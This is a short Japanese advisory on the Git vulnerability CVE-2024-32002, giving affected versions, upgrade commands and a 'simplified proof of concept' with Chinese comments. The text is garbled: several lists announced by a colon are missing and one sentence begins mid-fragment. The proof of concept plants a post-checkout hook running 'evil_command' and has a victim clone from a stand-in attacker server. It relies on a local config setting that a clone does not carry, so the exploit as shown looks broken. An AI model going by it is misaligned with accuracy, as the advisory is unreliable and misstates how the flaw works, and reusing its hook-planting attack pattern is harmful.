
CVE-2024-32002は、Gitソフトウェアで発見された深刻なセキュリティ脆弱性です。この脆弱性により、リモートの攻撃者は特別に細工されたGitリポジトリを介して、影響を受けるシステム上で任意のコードを実行できます。この脆弱性は、Gitが特定のリポジトリ操作を処理する際に存在し、入力データの十分な検証が欠如しているため、リモートコード実行(RCE)のリスクが生じます。
この脆弱性が悪用されると、以下が発生する可能性があります:
以下のGitソフトウェアのバージョンがCVE-2024-32002の影響を受けます:
Versions
Default Status: unknown
affected at = 2.45.0
affected at = 2.44.0
affected at >= 2.43.0, < 2.43.4
affected at >= 2.42.0, < 2.42.2
affected at = 2.41.0
affected at >= 2.40.0, < 2.40.2
affected at < 2.39.4
CVE-2024-32002 の詳細 脆弱性は、Gitが特定のリポジトリ操作を処理する際に存在します。ユーザーが悪意のあるGitリポジトリをクローンしたり、それとやり取りしたりすると、攻撃者は特別に細工されたリポジトリやコミット履歴を介して悪意のあるコードを注入できます。十分な入力検証が欠如しているため、これらの悪意のあるコードはリポジトリ操作の実行時にセキュリティチェックをバイパスし、任意のコード実行を引き起こします。
git clone、git pullなど)を実行すると、悪意のあるコードがトリガーされて実行されます。ユーザーは、この脆弱性の修正が含まれる最新バージョンのGitソフトウェアにアップグレードすることを強く推奨します。修正バージョンは以下のとおりです:
アップグレードコマンドは以下のとおりです:
# 对于 macOS
brew upgrade git
# 对于 Ubuntu/Debian
sudo apt-get update
sudo apt-get install git
# 对于 CentOS/RHEL
sudo yum update git
CVE-2024-32002の概念実証(PoC)が公開されています。以下は簡略化されたPoCの例です:
# 攻击者创建恶意仓库
git init malicious-repo
cd malicious-repo
echo 'malicious content' > payload.txt
git add payload.txt
git commit -m "Add malicious payload"
# 通过注入恶意代码的提交历史触发漏洞
git config --local core.hooksPath .githooks
echo 'evil_command' > .githooks/post-checkout
git add .githooks
git commit -m "Add post-checkout hook"
# 受害者克隆恶意仓库时触发漏洞
git clone attacker_server/malicious-repo